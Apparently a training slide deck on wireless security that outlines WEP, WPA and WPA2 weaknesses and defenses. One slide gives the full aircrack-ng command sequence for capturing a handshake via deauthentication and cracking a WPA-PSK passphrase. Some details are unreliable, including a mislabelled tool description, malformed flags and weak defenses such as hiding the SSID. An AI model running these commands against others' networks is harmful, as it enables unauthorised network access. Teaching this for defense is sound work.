Академический Документы
Профессиональный Документы
Культура Документы
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Wireless Networks and Security
What are Wireless Networks?
A wireless network is the way that a computer is connected to a
router without a physical link.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Wireless Networks and Security
Why security?
Attacker may hack a victims personal computer and steal his/her
personal pictures and documents or may perform some illegal
activities or crimes using the victims machine and ID.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Wireless Networks and Security
Three security approaches:
WEP (Wired Equivalent Privacy)
WPA (Wi-Fi Protected Access)
WPA2 (Wi-Fi Protected Access, Version 2)
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
WEP and its problems
Designed to provide the security of a wired LAN by encryption
through use of the RC4 algorithm with two side of a data
communication
Problems:
Size of IV is short (24 bit) and reused
Problem in the RC-4 algorithm
Easy forging of authentication messages [1]
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
WPA
Enterprise WPA or Commercial WPA: Authentication is made
by an authentication server 802.1x, generating control and
security in the users' traffic of the wireless network. No shared
key.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Improvements:
A cryptographic message integrity code, or MIC to defeat
forgeries.
A new IV sequencing authority, avoids replay attack.
A per-packet key mixing function, to de-correlate the public
IVs from weak keys.
A rekeying mechanism, to provide fresh encryption and
integrity keys, undoing the threat of attacks stemming from
key reuse. [2]
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Problem
Attacking a WPA-PSK network is possible.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
The Attack
airmon-ng
macchanger -s [Interface]
airodump-ng [The hackers station interface]
airodump-ng --bssid [MAC of Router] w [FILENAME] -c
[CHANNEL] [ADAPTER]
aireplay-ng -0 15 -a [MAC OF ROUTER] -c [MAC OF SYSTEM
ON NETWORK] [ADAPTER]
aircrack-ng -e [ESSID - Name of network] w [WORDLIST]
[FILENAME.cap]
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Tools Description: aircrack-ng
aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking
program that can recover keys once enough data packets
have been captured.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Tools Description: aircrack-ng
The primary function is to generate traffic for the later use in
aircrack-ng for cracking the WEP and WPA-PSK keys.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Tools Description: macchanger -s
In some situations you need to fake / change / spoof a MAC
address of your network interface.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Tools Description: airodump-ng
Airodump-ng is used for packet capturing of raw 802.11
frames and is particularly suitable for collecting WEP IVs
(Initialization Vector) for the intent of using them with
aircrack-ng. If you have a GPS receiver connected to the
computer, airodump-ng is capable of logging the coordinates
of the found access points.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Defense
None of the attack methods are faster or effective when a
larger passphrase is used.
Hide SSID
MAC filtering maintain access control list
Not allowing MAC de-authentication
Letter-envelop protocol [4]
Stop attacker from acquiring client signals
iJam [5]
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
WPA 2
WPA2, like WPA, supports two modes of security, sometimes
referred to as home user and corporate.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
WPA 2
The corporate security is based on 802.1X, the EAP
authentication framework (including RADIUS), one of several
EAP types (such as EAP-TLS, which provides a much stronger
authentication system), and secure key distribution.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Conclusion
We show that WPA can also be attacked and we can defend
against such an attack by following the approaches
mentioned.
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )
Thank you!!
S u m m e r T r a i n i n g P r o g r a m ( w w w . w e g v e r s i t y. c o m / s t p )